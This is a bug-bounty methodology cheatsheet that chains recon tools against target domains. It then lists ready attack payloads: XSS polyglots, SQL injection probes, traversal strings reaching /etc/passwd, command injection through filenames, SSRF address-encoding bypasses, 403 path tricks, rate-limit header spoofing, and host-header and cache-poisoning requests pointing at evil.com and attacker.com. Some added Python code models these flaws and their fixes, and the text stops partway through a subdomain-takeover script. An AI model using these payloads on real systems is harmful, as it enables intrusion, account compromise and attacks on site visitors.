
Methodology

This is my personal bug hunter methodology/cheatsheet, collected from my own experience and from other resources. The reporting reference is based on a pentesting methodology, but the same method works for bug hunting.

Don't worry if you are confused, I am too :) This is just brainstorming, have a nice day ;)

Finding Target with Dork

  1. Pick a target and look up relevant dorks in the Google Hacking Database (https://www.exploit-db.com/google-hacking-database).

  2. Scope the dork to the target domain:

    site:domain <dork>
    

List of Tests Perform

Information Gathering

Subdomain enumeration

#!/bin/bash
# enumerate subdomains with several tools and merge the results
# usage: ./subs.sh example.domain   ($1 = root domain)

python sublist3r.py -d "$1" -o "domains_$1"

amass enum --passive -d "$1" | tee -a "domains_$1"
assetfinder --subs-only "$1" | tee -a "domains_$1"

subfinder -d "$1" -o "domains_subfinder_$1"
cat "domains_subfinder_$1" | tee -a "domains_$1"

# dedupe, then keep only names that actually resolve
sort -u "domains_$1" -o "domains_$1"
cat "domains_$1" | filter-resolved | tee -a "domains_$1.txt"
# one-off variant: enumerate, probe which hosts answer HTTP(S), record status code and size
subfinder -d example.com -o subexample.txt
httpx -l subexample.txt -threads 200 -o active_subexample.txt
cat active_subexample.txt | parallel -j50 -q curl -w 'Status:%{http_code}\t  Size:%{size_download}\t %{url_effective}\n' -o /dev/null -sk > scan_output.txt
# feed Shodan's view of the domain, or subfinder output, straight into nuclei
shodan domain example.com | awk '{print $3}' | httpx -silent | nuclei -t ~/nuclei-templates/
subfinder -d example.com | nuclei -es info,low

Use grep to extract URLs

# note: the pattern must stay inside the quotes; a trailing * outside them is a shell glob, not part of the regex
cat file | grep -Eo "https?://[a-zA-Z0-9./?=_-]*"

curl -s http://example.com/ | grep -Eo "https?://[a-zA-Z0-9./?=_-]*"

Find JavaScript files using gau and httpx

# match .js at the end of the path or before a query string (foo.js?v=3), then keep only live JavaScript responses
echo target.com | gau | grep -E '\.js(\?|$)' | httpx -status-code -mc 200 -content-type | grep 'application/javascript'

Extract API endpoints from javascript files

cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u

Find JavaScript files with httpx and subjs

cat domains | httpx -silent | subjs | anew

JSFScan.sh

$ git clone https://github.com/KathanP19/JSFScan.sh
$ cd JSFScan.sh/
$ docker build . -t jsfscan

$ docker run -it jsfscan "/bin/bash"

$ cat target.txt
https://example.com
https://example2.com

$ bash JSFScan.sh -l target.txt --all -r -o output.ru

$ docker cp <container_id>:/path/output.ru /wheretoplace/output.ru

# open output.ru/report.html in browser

SecretFinder

$ git clone https://github.com/m4ll0k/SecretFinder.git secretfinder
$ cd secretfinder
$ python3 -m pip install -r requirements.txt
# scan one JavaScript file for keys/tokens and print the hits to the terminal
$ python3 SecretFinder.py -i https://example.com/app.js -o cli

Nuclei

# https://github.com/projectdiscovery/nuclei
# https://nuclei-templates.netlify.app/
# install: sudo apt install nuclei, or go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
# nuclei -update-templates fetches the templates into ~/nuclei-templates (adjust the -t path below to match)

echo "https://example.com" | nuclei -t /home/kali/nuclei-templates -severity low,medium,high,critical 
cat targets.txt | nuclei -t /home/kali/nuclei-templates -severity low,medium,high,critical 
cat targets.txt | nuclei -t /home/kali/nuclei-templates -severity low,medium,high,critical -ept ssl 
nuclei -l targets -severity low,medium,high,critical -ept ssl -o output.txt

xray

# https://github.com/chaitin/xray
# https://github.com/chaitin/xray/releases/tag/1.9.11
xray webscan --basic-crawler http://example.com --html-output vuln.html

Using VPS

# list screen sessions
screen -ls
# create a named screen session
screen -S bugbounty-auto
# detach from the session with Ctrl-a d; re-attach later (detaching it elsewhere if needed)
screen -r -d bugbounty-auto

Assetfinder + gau: harvest JavaScript variable names as candidate parameters

# for every archived non-asset URL, pull "var xyz" names out of the response and print them as url?xyz=xss candidates
assetfinder example.com | gau | grep -Ev '\.(css|png|jpe?g|svg|gif|woff)' | while read -r url; do vars=$(curl -s "$url" | grep -Eo "var [a-zA-Z0-9]+" | sort -u | awk -v u="$url" '{print u "?" $2 "=xss"}'); echo -e "\e[1;33m$url\n\e[1;32m$vars"; done

Fingerprint the technologies a website is built with (wappylyzer)

git clone https://github.com/vincd/wappylyzer.git
cd wappylyzer
pip install -r requirements.txt
cat urls-alive.txt | parallel -j 50 "echo {}; python3 main.py analyze --url {}"

Search interesting parameters

# install gf and gf patterns (walkthrough: https://www.youtube.com/watch?v=w8q9CJ5GioI)
go install github.com/tomnomnom/gf@latest

git clone https://github.com/mrofisr/gf-patterns.git
mkdir -p ~/.gf
cp gf-patterns/*.json ~/.gf
cat url-list.txt | gf redirects

# ParamSpider: https://github.com/devanshbatham/ParamSpider
paramspider -d example.com
paramspider -l domains.txt
paramspider -d example.com -p '"><h1>reflection</h1>'
paramspider --domain <target_domain> --level high --output params.txt   # older release syntax

# collect archived URLs, keep the XSS-candidate parameters, then fuzz them with dalfox
echo "domain" | ~/go/bin/waybackurls -no-subs | tee urls.txt
cat domains.txt | ~/go/bin/waybackurls -no-subs | tee urls.txt
cat urls.txt | gf xss | sed 's/=.*/=/' | sed 's/URL: //' | sort -u | tee xss-output.txt
gf xss urls.txt | sed 's/=.*/=/' | sed 's/URL: //' | sort -u | tee xss-output.txt
cat xss-output.txt | dalfox pipe

Waybackurls

go install github.com/tomnomnom/waybackurls@latest

waybackurls url
cat domains.txt | waybackurls > urls

CVE search for clues

  1. Go to https://cve.mitre.org/cve/search_cve_list.html
  2. Search for the stack you identified, e.g. laravel / laravel input / wordpress misconfiguration / etc.

Checking for the WAF

wafw00f --help
wafw00f <url>

Testing

XSS

Simple XSS check

#!/bin/bash
# $1 => example.domain

subfinder -d "$1" -o "domains_subfinder_$1"
amass enum --passive -d "$1" -o "domains_$1"

cat "domains_subfinder_$1" | tee -a "domains_$1"
cat "domains_$1" | filter-resolved | tee -a "domains_$1.txt"

# probe the usual extra ports too, pull archived URLs, and let kxss report parameters that reflect special characters unencoded
cat "domains_$1.txt" | ~/go/bin/httprobe -p http:81 -p http:8080 -p https:8443 | waybackurls | kxss | tee xss.txt

Javascript polyglot for XSS

-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>

XSS Tools

  • XSSHunter
  • XSStrike
    python xsstrike.py -u https://example.com/?id=1
    python xsstrike.py -u https://example.com/path/to/somewhere
    
  • xss_vibes
    git clone https://github.com/faiyazahmad07/xss_vibes
    pip3 install -r requirements.txt
    
    python3 main.py -f urls.txt -o vuln.txt
    python3 main.py -f urls.txt -H "Cookie: test=123;id=asdasd, User-Agent: Mozilla/Firefox" -t 7 -o result.txt
    python3 main.py -f urls.txt -H "Cookie: test=123;id=asdasd" -t 7 -o result.txt
    python3 main.py -u http://example.com/hpp/?pp=12 -o out.txt
    python3 main.py -u http://example.com/hpp/?pp=12 -o out.txt --waf
    python3 main.py -u http://example.com/hpp/?pp=12 -o out.txt -w cloudflare
    cat katana.txt | python3 main.py --pipe -t 7
    
  • dalfox
    go install github.com/hahwul/dalfox/v2@latest
    dalfox url http://testphp.vulnweb.com/listproducts.php\?cat\=123\&artist\=123\&asdf\=ff -b https://your-callback-url
    dalfox file urls_file --custom-payload ./mypayloads.txt
    cat urls_file | dalfox pipe -H "AuthToken: bbadsfkasdfadsf87"
    
  • https://bxsshunter.com/
  • https://xss.report/


XSS via a login redirect parameter

?redirectUrl=/me/m">
?redirectUrl=/me/m</script><svg/onload=prompt(document.domain)>

Reverse tabnabbing via an editable profile link (missing rel="noopener")

  1. Set the profile link to https://google.com and click it so it opens in a new tab.
  2. In the new tab open the developer console and run: opener.location="alert"
  3. If the original tab navigates to https://google.com/alert, the link exposed window.opener and an attacker-controlled link target could redirect the victim's tab.

XSS via the Referer header reflected into a script block

...
Referer: http://www.google.com/search?hl=en&q=c5obc'+alert()+'p7yd5
}}})</script><script>alert()</script>

XXE

XXEInjector

  • XXEinjector
    # Enumerating /etc directory in HTTPS application:
    ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl
    # Enumerating /etc directory using gopher for OOB method:
    ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher
    # Second order exploitation:
    ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt
    # Bruteforcing files using HTTP out of band method and netdoc protocol:
    ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc
    # Enumerating using direct exploitation:
    ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARKSTART,UNIQUEMARKEND
    # Enumerating unfiltered ports:
    ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all
    # Stealing Windows hashes:
    ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes
    # Uploading files using Java jar:
    ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf
    # Executing system commands using PHP expect:
    ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls
    # Testing for XSLT injection:
    ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt
    # Log requests only:
    ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt
    

SSRF

SSRFDetector

  • ssrfDetector
    git clone https://github.com/JacobReynolds/ssrfDetector.git
    docker-compose build
    docker-compose up
    
    docker-compose down
    docker-compose up
    

Git

Work with Git

  • GitTools

    git clone https://github.com/internetwache/GitTools.git
    ./gitfinder.py -h
    
    wget http://s3.amazonaws.com/alexa-static/top-1m.csv.zip
    unzip top-1m.csv.zip
    sed -i.bak 's/.*,//' top-1m.csv
    ./gitfinder.py -i top-1m.csv
    
    ./gitdumper.sh -h
    
    ./extractor.sh /tmp/mygitrepo /tmp/mygitrepodump
    

  • git-all-secrets

Rate Limit

Bypass Rate Limit

# if the limiter keys on a client-supplied header instead of the real peer address, rotate the value per request
X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Host: IP
X-Forwarded-Host: IP
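Why the header trick works, as an added example (my own model, not code from the original cheatsheet): a sliding-window limiter whose client key is taken from X-Forwarded-For, beside one that only trusts the entry appended by a known proxy. The proxy address, peer addresses and the request budget are constructed for the demo.

```python
# Added example (not from the original cheatsheet): rate limiter keyed on a
# spoofable header vs. one keyed on what the trusted proxy actually observed.
# 10.0.0.5 (our proxy), 203.0.113.7 (attacker) and the limit are constructed.
from collections import defaultdict, deque

TRUSTED_PROXIES = {"10.0.0.5"}          # assumed address of our own reverse proxy


class WindowLimiter:
    """Allow at most `limit` requests per key inside a sliding `window` (seconds)."""

    def __init__(self, limit: int, window: float):
        self.limit, self.window = limit, window
        self.hits = defaultdict(deque)

    def allow(self, key: str, now: float) -> bool:
        q = self.hits[key]
        while q and now - q[0] >= self.window:
            q.popleft()                      # expire hits that left the window
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


def key_trusting_xff(peer_ip: str, headers: dict) -> str:
    """Vulnerable: any client can choose its own bucket by sending a header."""
    for name in ("X-Forwarded-For", "X-Originating-IP", "X-Remote-IP",
                 "X-Remote-Addr", "X-Client-IP", "X-Host", "X-Forwarded-Host"):
        if name in headers:
            return headers[name].split(",")[0].strip()
    return peer_ip


def key_trusting_proxy(peer_ip: str, headers: dict) -> str:
    """Safer: honour X-Forwarded-For only when the TCP peer is our proxy, and
    then take the *last* entry, the address that proxy itself saw."""
    if peer_ip in TRUSTED_PROXIES and headers.get("X-Forwarded-For"):
        return headers["X-Forwarded-For"].split(",")[-1].strip()
    return peer_ip


def simulate(key_func, attempts: int, via_proxy: bool = False, limit: int = 5) -> int:
    """One attacker sends `attempts` login requests, each with a fresh spoofed
    X-Forwarded-For. Returns how many the limiter let through."""
    limiter = WindowLimiter(limit=limit, window=60.0)
    allowed = 0
    for i in range(attempts):
        spoofed = f"198.51.100.{i}"
        if via_proxy:   # the proxy appends the real client after whatever was sent
            peer, xff = "10.0.0.5", f"{spoofed}, 203.0.113.7"
        else:           # attacker talks to the app directly
            peer, xff = "203.0.113.7", spoofed
        if limiter.allow(key_func(peer, {"X-Forwarded-For": xff}), now=float(i)):
            allowed += 1
    return allowed


if __name__ == "__main__":
    print("keyed on XFF, via proxy   :", simulate(key_trusting_xff, 20, via_proxy=True), "of 20 allowed")
    print("keyed on proxy's view     :", simulate(key_trusting_proxy, 20, via_proxy=True), "of 20 allowed")
```

The same idea applies to every header in the list above: if the application reads it without checking who set it, each request can land in a fresh bucket.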

Bypass 403 & 401

See the 403/401 bypass page on book.hacktricks.xyz; the URI path tricks listed further down are the usual starting point.

Open redirect

Find open redirect

echo "http://tesla.com" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew

Upload vuln

File types and the bug classes they can carry:

ASP / ASPX / PHP5 / PHP / PHP3: webshell / RCE
SVG: stored XSS / SSRF / XXE
GIF: stored XSS / SSRF
CSV: CSV injection
XML: XXE
AVI: LFI / SSRF
HTML / JS: HTML injection / XSS / open redirect
PNG / JPEG: pixel flood attack (DoS)
ZIP: RCE via LFI / DoS
PDF / PPTX: SSRF / blind XXE

Filename and filter bypass tricks:

/?file=xx.php    <-- blocked
/?file===xx.php  <-- bypassed
file.jpg%00shell.php
shell.php%00file.jpg
shell.php%00.jpg

./../../tmp/lol.png                            <-- path traversal in the filename
sleep(10)-- -.jpg                              <-- SQL injection via the filename
<svg onload=alert(document.domain)>.jpg/png    <-- XSS via the filename
; sleep 10;                                    <-- command injection via the filename

SQL Injection

Test for SQL Injection

/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||'  <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='

Some directory traversal payloads

\..\WINDOWS\win.ini
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
.?\.?\.?\etc\passwd
../../boot.ini
%0a/bin/cat%20/etc/passwd
\\'/bin/cat%20/etc/passwd\\'
..%c1%afetc%c1%afpasswd    <-- %c1%af is an overlong UTF-8 encoding of "/"

Some SSRF bypass payloads

http://127.127.127.127
http://127.0.0.0
http://127.1
http://0
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/    <-- URL parsers disagree on which host this is; urllib resolves 3.3.3.3
http://127.1.1.1:80\@127.2.2.2:80/
http://[::]:80/
http://0000::1:80/
http://2130706433/
http://whitelisted@127.0.0.1
http://0x7f000001/
http://017700000001
http://0177.00.00.01
http://⑯⑨。②⑤④。⑯⑨。②⑤④/
http://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/
http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/
http://②⑧⑤②⓪③⑨①⑥⑥:80/
http://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/
http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80/
http://127.0.0.1.nip.io:8080 -> 127.0.0.1:8080
# the following all denote 216.58.214.227 (hex, mixed-radix, octal, decimal and percent-encoded spellings)
http://0xd8.0x3a.0xd6.0xe3
http://0xd83ad6e3
http://0xd8.0x3ad6e3
http://0xd8.0x3a.0xd6e3
http://0330.072.0326.0343
http://000330.0000072.0000326.00000343
http://033016553343
http://3627734755
http://%32%31%36%2e%35%38%2e%32%31%34%2e%32%32%37
http://216.0x3a.00000000326.0xe3
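To see why most of the spellings above collapse to the same address, here is an added example (my own code, not from the cheatsheet) that decodes IPv4 literals the way inet_aton()-style resolvers do, including the enclosed-alphanumeric digits, and then decides whether a URL targets an internal address. It uses only the standard library; the loopback/link-local classification and the "fail closed on unparsable input" rule are my design choices, and anything that is a real hostname (the nip.io case) is reported as "needs DNS" rather than guessed.

```python
# Added example (not from the original cheatsheet): decode alternate IPv4
# spellings the way inet_aton()-style resolvers do, then classify the target.
import ipaddress
import re
import unicodedata
from urllib.parse import unquote, urlsplit

# Label separators that resolvers treat as "." (IDNA); NFKC alone does not
# map U+3002 to ".", so translate them explicitly.
_DOTS = str.maketrans({"\u3002": ".", "\uff0e": ".", "\uff61": "."})


def _part_to_int(part: str):
    """inet_aton rules: 0x.. is hex, a leading 0 is octal, otherwise decimal."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", part):
        return int(part, 16)
    if re.fullmatch(r"0[0-7]*", part):        # "0", "017", "000330"
        return int(part, 8)
    if re.fullmatch(r"[1-9][0-9]*", part):
        return int(part, 10)
    return None                                # not a numeric part


def loose_ipv4(host: str):
    """Dotted quad for any inet_aton()-style spelling of an IPv4 host, or None
    if the host is not a numeric address (e.g. it needs DNS)."""
    host = unicodedata.normalize("NFKC", unquote(host)).translate(_DOTS).strip()
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = [_part_to_int(p) for p in parts]
    if any(v is None for v in values):
        return None
    *lead, last = values
    # a.b.c.d -> 8-bit last part; a.b.c -> 16-bit; a.b -> 24-bit; a -> 32-bit
    if any(v > 255 for v in lead) or last >= 1 << (8 * (5 - len(values))):
        return None   # inet_aton rejects these; some stacks silently mask the byte
    number = last
    for i, v in enumerate(lead):
        number |= v << (24 - 8 * i)
    return str(ipaddress.IPv4Address(number))


def is_internal_target(url: str):
    """True if the URL's host is a loopback/private/link-local/unspecified
    literal, False if it is a public literal, None if it is a hostname that
    must be resolved (and re-checked) before the request is allowed."""
    host = urlsplit(url).hostname
    if not host:
        return True                            # unparsable: fail closed
    literal = loose_ipv4(host)
    try:
        addr = ipaddress.ip_address(literal if literal else host)   # also IPv6 like [::]
    except ValueError:
        return None
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_unspecified or addr.is_reserved)


if __name__ == "__main__":
    for u in ["http://2130706433/", "http://0x7f000001/", "http://017700000001/",
              "http://127.1/", "http://0/", "http://[::]:80/",
              "http://⑯⑨。②⑤④。⑯⑨。②⑤④/", "http://0xd8.0x3a.0xd6e3/",
              "http://whitelisted@127.0.0.1", "http://127.0.0.1.nip.io:8080"]:
        print(f"{u:42} -> {loose_ipv4(urlsplit(u).hostname)}  internal={is_internal_target(u)}")
```

A literal that this function accepts is only half of the story: a defence must also resolve hostnames and apply the same classification to every address returned, and do it again per redirect, because 127.0.0.1.nip.io and a DNS record that changes between check and use both pass a string-level check.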

Valid email address formats that carry a payload

# quoted local parts and (comments) are RFC 5322 valid, so a validator that accepts them stores the payload intact
"payload"@domain.com
name@"payload"domain.com
name(payload)@domain.com
name@(payload)domain.com
name@domain.com(payload)

URI path tricks (403/401 bypass)

https://target.com/admin/
https://target.com/admin..;/
https://target.com/../admin
https://target.com/whatever/..;/admin
https://site.com/secret
https://site.com/secret/
https://site.com/secret/.
https://site.com//secret//
https://site.com/./secret/..
redirect_to=////evil%E3%80%82com    <-- open-redirect variant: %E3%80%82 is U+3002, which hosts treat as a dot
https://target.com/admin
https://target.com/admin%20/
https://target.com/%20admin%20/
https://target.com/admin%20/page
/accessible/..;/admin
/.;/admin
/admin;/
/admin/~
/./admin/./
/admin?param
/%2e/admin
/admin#
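The reason several of these work is that the edge component checks the raw path while the backend routes on a normalized one. Here is an added example (my own model, not the cheatsheet's code and not any specific product's normalizer) that shows the mismatch and the hardened check; the `/admin` prefix and the servlet-container-style rules (percent-decode, strip `;param` suffixes, resolve `.` and `..`, collapse `//`) are assumptions for the demo.

```python
# Added example (not from the original cheatsheet): a prefix ACL applied to the
# raw path vs. the backend's normalized path. ADMIN_PREFIX and the normalizer
# rules are a constructed model of Tomcat-style behaviour.
from urllib.parse import unquote

ADMIN_PREFIX = "/admin"


def edge_denies(raw_path: str) -> bool:
    """Naive reverse-proxy ACL: compares the *raw* request path only."""
    return raw_path.startswith(ADMIN_PREFIX)


def backend_normalize(raw_path: str) -> str:
    """Model of a servlet-container normalizer: percent-decode once, drop
    ';param' suffixes from each segment (path parameters), resolve '.' and
    '..', and collapse the empty segments produced by '//'."""
    resolved = []
    for segment in unquote(raw_path).split("/"):
        segment = segment.split(";", 1)[0]        # "..;" -> "..", ".;" -> "."
        if segment in ("", "."):
            continue
        if segment == "..":
            if resolved:
                resolved.pop()
            continue
        resolved.append(segment)
    return "/" + "/".join(resolved)


def bypasses_edge(raw_path: str) -> bool:
    """True when the edge lets the request through but the backend still
    routes it under the protected prefix."""
    return (not edge_denies(raw_path)
            and backend_normalize(raw_path).startswith(ADMIN_PREFIX))


def hardened_denies(raw_path: str) -> bool:
    """Apply the rule to the path normalized the same way the backend does.
    The only complete fix is to enforce authorization in the backend itself."""
    return backend_normalize(raw_path).startswith(ADMIN_PREFIX)


if __name__ == "__main__":
    for p in ["/admin", "/whatever/..;/admin", "/.;/admin", "/%2e/admin",
              "//admin", "/./admin/./", "/accessible/..;/admin", "/public/page"]:
        print(f"{p:24} edge={edge_denies(p)!s:5} backend={backend_normalize(p):12} "
              f"bypass={bypasses_edge(p)!s:5} hardened={hardened_denies(p)}")
```

When a candidate from the list above returns 200 where the plain `/admin` returned 403, compare the two components' normalization rules rather than stopping at the first hit: the same trick often opens every path under the prefix.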

Unicode-Mapping-on-Domain-names

Identify session invalidation issues

  1. Log in to the application.
  2. Navigate around the pages.
  3. Log out.
  4. Press Alt + left arrow (browser back).
  5. If you are still logged in, or can view the pages you navigated earlier, the session was not invalidated server-side (or the authenticated pages were served from the browser cache): give yourself a pat.
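The server-side difference behind that check, as an added example (my own code, not from the cheatsheet): a session store whose logout only tells the browser to drop the cookie, beside one that revokes the token, plus the cache headers that stop the back button from showing a stored copy. User names, the TTL and the cookie name are constructed.

```python
# Added example (not from the original cheatsheet): client-only logout vs.
# server-side revocation. "alice", the TTL and the cookie name are constructed.
import secrets
import time


class SessionStore:
    def __init__(self, ttl_seconds: int = 3600):
        self.ttl = ttl_seconds
        self._sessions = {}          # token -> (username, expiry timestamp)

    def login(self, username: str, now: float) -> str:
        token = secrets.token_urlsafe(32)
        self._sessions[token] = (username, now + self.ttl)
        return token

    def user_for(self, token: str, now: float):
        """Who does this cookie authenticate as? None if unknown or expired."""
        entry = self._sessions.get(token)
        if entry is None or now >= entry[1]:
            self._sessions.pop(token, None)
            return None
        return entry[0]

    def logout_client_only(self, token: str) -> dict:
        """Vulnerable pattern: only instruct the browser to drop the cookie.
        The server keeps honouring the token until its TTL runs out."""
        return {"Set-Cookie": "session=; Max-Age=0; Path=/"}

    def logout_revoke(self, token: str) -> dict:
        """Correct pattern: destroy the server-side record as well."""
        self._sessions.pop(token, None)
        return {"Set-Cookie": "session=; Max-Age=0; Path=/"}


# Headers for authenticated pages so the browser does not replay them from
# its cache after logout; this complements revocation, it does not replace it.
NO_STORE_HEADERS = {"Cache-Control": "no-store, max-age=0", "Pragma": "no-cache"}


def replay_after_logout(revoke: bool) -> bool:
    """Run the test from the list above: log in, log out, replay the old cookie
    (what a saved request or the back button does). True = still authenticated."""
    store = SessionStore()
    t0 = time.time()
    token = store.login("alice", t0)
    if revoke:
        store.logout_revoke(token)
    else:
        store.logout_client_only(token)
    return store.user_for(token, t0 + 1) is not None


if __name__ == "__main__":
    print("client-only logout, old cookie still valid:", replay_after_logout(revoke=False))
    print("server-side revoke, old cookie still valid:", replay_after_logout(revoke=True))
```

When reporting, replay the captured pre-logout cookie with a fresh request rather than relying on the back button alone: the back button can show a cached page even when the session really was revoked, and that is a separate, lower-severity caching finding.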

Host Header Injection

X-Forwarded-Host: bing.com"><img src/onerror=prompt(document.cookie)>

GET /admin HTTP/1.1
Host: localhost
X-Forwarded-Host: evil.com

Web Cache Poisoning

Th0h0/autopoisoner
Hackmanit/Web-Cache-Vulnerability-Scanner

# unkeyed header reflected into the cached page
GET /en?region=uk HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: a."><script>alert(1)</script>"

# unkeyed cookie reflected into the cached page
GET / HTTP/1.1
Host: vulnerable.com
Cookie: session=VftzO7ZtiBj5zNLRAuFpXpSQLjS4lBmU; fehost=asd"%2balert(1)%2b"

# poisoning the path of a cached script include
GET /resources/js/tracking.js HTTP/1.1
Host: acc11fe01f16f89c80556c2b0056002e.web-security-academy.net
X-Forwarded-Host: ac8e1f8f1fb1f8cb80586c1d01d500d3.web-security-academy.net/
X-Forwarded-Scheme: http

# cache keyed on User-Agent: poison only the entry a specific victim will hit
GET / HTTP/1.1
Host: vulnerable.net
User-Agent: THE SPECIAL USER-AGENT OF THE VICTIM
X-Host: attacker.com
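A model of what the first request above achieves, as an added example (my own code, not the cheatsheet's): a cache keyed only on Host and path sitting in front of an origin that builds a script URL from X-Forwarded-Host, so one attacker request is served to every later visitor. The hardened origin only honours the header from its own proxy, allow-lists the value and encodes it. Hostnames, addresses and bodies are constructed.

```python
# Added example (not from the original cheatsheet): unkeyed X-Forwarded-Host
# poisoning a shared cache. innocent-website.com, 10.0.0.5 and the peer
# addresses are constructed for the demo.
from html import escape

TRUSTED_PROXY_IPS = {"10.0.0.5"}      # assumed address of our own load balancer
ALLOWED_HOSTS = {"innocent-website.com", "www.innocent-website.com"}


def origin_vulnerable(req: dict) -> dict:
    """Origin that trusts X-Forwarded-Host from anyone and marks the page public."""
    host = req["headers"].get("X-Forwarded-Host", req["headers"]["Host"])
    body = f'<script src="https://{host}/resources/js/tracking.js"></script>'
    return {"status": 200, "headers": {"Cache-Control": "public, max-age=30"}, "body": body}


def origin_hardened(req: dict) -> dict:
    """Origin that honours X-Forwarded-Host only from the proxy that sets it,
    validates the result against an allow-list, and encodes it on output."""
    headers = req["headers"]
    host = headers["Host"]
    if req["peer_ip"] in TRUSTED_PROXY_IPS and "X-Forwarded-Host" in headers:
        host = headers["X-Forwarded-Host"]
    if host not in ALLOWED_HOSTS:
        return {"status": 421, "headers": {"Cache-Control": "no-store"}, "body": "bad host"}
    body = f'<script src="https://{escape(host, quote=True)}/resources/js/tracking.js"></script>'
    return {"status": 200, "headers": {"Cache-Control": "public, max-age=30"}, "body": body}


class Cache:
    """Shared cache keyed only on (Host, path+query): X-Forwarded-Host is unkeyed."""

    def __init__(self, origin):
        self.origin, self.store = origin, {}

    def fetch(self, req: dict) -> tuple:
        key = (req["headers"]["Host"], req["path"])
        if key in self.store:
            return self.store[key], True                  # HIT
        resp = self.origin(req)
        if "public" in resp["headers"].get("Cache-Control", ""):
            self.store[key] = resp
        return resp, False                                # MISS


def poisoning_run(origin) -> str:
    """Attacker poisons /en?region=uk, then an ordinary victim requests it.
    Returns the body the victim receives."""
    cache = Cache(origin)
    attacker = {"peer_ip": "203.0.113.9", "path": "/en?region=uk",
                "headers": {"Host": "innocent-website.com",
                            "X-Forwarded-Host": 'a."><script>alert(1)</script>"'}}
    victim = {"peer_ip": "198.51.100.2", "path": "/en?region=uk",
              "headers": {"Host": "innocent-website.com"}}
    cache.fetch(attacker)
    resp, _hit = cache.fetch(victim)
    return resp["body"]


if __name__ == "__main__":
    print("vulnerable origin, victim sees:", poisoning_run(origin_vulnerable))
    print("hardened origin,   victim sees:", poisoning_run(origin_hardened))
```

The practical check mirrors the model: add a cache-buster to the query string so you only poison your own entry, send the header once, then fetch again without the header and look for your value in a response marked as a cache hit.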

Web Cache Deception

akr3ch/deceptor
https://hackerone.com/reports/593712

HTTP Request Smuggling

Subdomain Takeover

  1. List related hosts: https://www.virustotal.com/gui/domain/<SUBDOMAIN>/relations
  2. Check each subdomain with https://httpstatus.io/ and look only at the 404 responses.
  3. nslookup sub.domain.com and note the CNAME target: does it still exist?
  4. Match the CNAME target and the error page against can-i-take-over-xyz (https://github.com/EdOverflow/can-i-take-over-xyz).
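The decision logic behind steps 3 and 4, as an added example (my own code, not the cheatsheet's), run over constructed nslookup/httpstatus-style observations. The fingerprint table is a small illustrative sample of the kind catalogued by can-i-take-over-xyz, not a copy of it; confirm every candidate against that project and the provider before reporting.

```python
# Added example (not from the original cheatsheet): triage of dangling CNAMEs.
# FINGERPRINTS is a short illustrative sample; SAMPLE observations are constructed.
from typing import Optional

# (provider, CNAME target suffix, text served for an unclaimed resource)
FINGERPRINTS = [
    ("GitHub Pages", ".github.io", "There isn't a GitHub Pages site here"),
    ("Heroku", ".herokuapp.com", "No such app"),
    ("AWS S3", ".amazonaws.com", "NoSuchBucket"),
    ("Shopify", ".myshopify.com", "Sorry, this shop is currently unavailable"),
]


def classify(cname: Optional[str], target_resolves: bool, body: str) -> str:
    """Verdict for one subdomain.

    likely-takeover:<provider>  CNAME points at a known provider and the error
                                page carries that provider's "unclaimed" text
    dangling-nxdomain           CNAME target no longer resolves; takeover depends
                                on whether that target name can be registered
    no-cname                    not a dangling-CNAME case (check A/NS separately)
    not-vulnerable              CNAME target is alive and serving its own content
    """
    if cname is None:
        return "no-cname"
    cname = cname.rstrip(".").lower()
    for provider, suffix, marker in FINGERPRINTS:
        if cname.endswith(suffix) and marker in body:
            return f"likely-takeover:{provider}"
    if not target_resolves:
        return "dangling-nxdomain"
    return "not-vulnerable"


def triage(observations: list) -> dict:
    """observations: (subdomain, cname, target_resolves, http_status, body).
    The status code is kept for the report, but the verdict keys on the body:
    providers differ in what status their unclaimed page returns."""
    return {sub: classify(cname, alive, body)
            for sub, cname, alive, _status, body in observations}


# Constructed observations standing in for nslookup + httpstatus.io output.
SAMPLE = [
    ("docs.example.com", "example-docs.github.io.", True, 404, "There isn't a GitHub Pages site here."),
    ("app.example.com", "old-app.herokuapp.com.", True, 404, "No such app"),
    ("static.example.com", "static-bucket.s3.amazonaws.com.", True, 404, "<Code>NoSuchBucket</Code>"),
    ("retired.example.com", "retired.azurewebsites.net.", False, None, ""),
    ("www.example.com", "www.example.com.cdn.cloudflare.net.", True, 200, "<html>welcome</html>"),
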